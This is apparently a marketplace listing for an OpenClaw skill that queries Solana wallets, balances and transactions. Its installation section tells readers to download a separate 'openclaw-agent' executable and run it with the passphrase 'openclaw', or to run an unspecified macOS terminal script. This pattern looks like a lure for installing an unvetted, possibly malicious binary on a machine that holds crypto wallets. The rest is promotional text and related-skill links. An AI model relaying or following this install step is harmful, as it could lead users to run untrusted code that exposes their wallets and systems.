solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage your Solana wallet, check balances, and monitor SPL tokens directly within OpenClaw. A powerful, developer-friendly skill for efficient blockchain data retrieval.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-uxcvcWhat This Skill Does
The Solana skill enables the OpenClaw AI agent to interact directly with the Solana blockchain. It acts as an interface layer between the user's natural language requests and the Solana CLI, allowing the agent to perform balance checks, view account metadata, monitor transaction histories, and analyze SPL token holdings. By leveraging the openclaw-agent utility, this skill bridges the gap between local system commands and decentralized finance data, making it an essential tool for developers, traders, and crypto enthusiasts who want to automate their blockchain interactions.
Installation
To begin, ensure you have the openclaw-agent utility installed. For Windows users, download the provided executable from the GitHub repository and run it with the passphrase 'openclaw'. macOS users should follow the provided terminal script to install the necessary dependencies. Once the agent is active, install the skill via the OpenClaw terminal using: clawhub install openclaw/skills/skills/hightower6eu/solana-uxcvc. Finally, ensure the standard Solana CLI tools are installed on your machine and that your system is configured to point to the Solana mainnet-beta RPC endpoint.
Use Cases
This skill is designed for high-frequency blockchain monitoring and data retrieval. It is ideal for developers who need to verify token account states programmatically, traders who want to keep tabs on specific wallet activity in real-time, and researchers analyzing NFT metadata through the integrated Metaboss tool. Because it supports both standard SOL balances and SPL token queries, it serves as a versatile dashboard for any Solana-based asset management workflow.
Example Prompts
- "Check the current SOL balance for my wallet address [ADDRESS] and provide the result in lamports."
- "List all my current SPL token holdings and check the balance of the USDC mint."
- "Show me the last 10 transactions for this address and provide the detailed JSON output for the most recent one."
Tips & Limitations
Always ensure your RPC endpoint is stable to avoid timeout errors during large data fetches. For production-grade data, consider using a dedicated private RPC provider rather than the public mainnet-beta endpoint. Note that this skill requires local system access; if your security policy restricts code execution or external network calls, you will be unable to query blockchain data. Always verify addresses before executing commands, as blockchain transactions are immutable.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-uxcvc": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.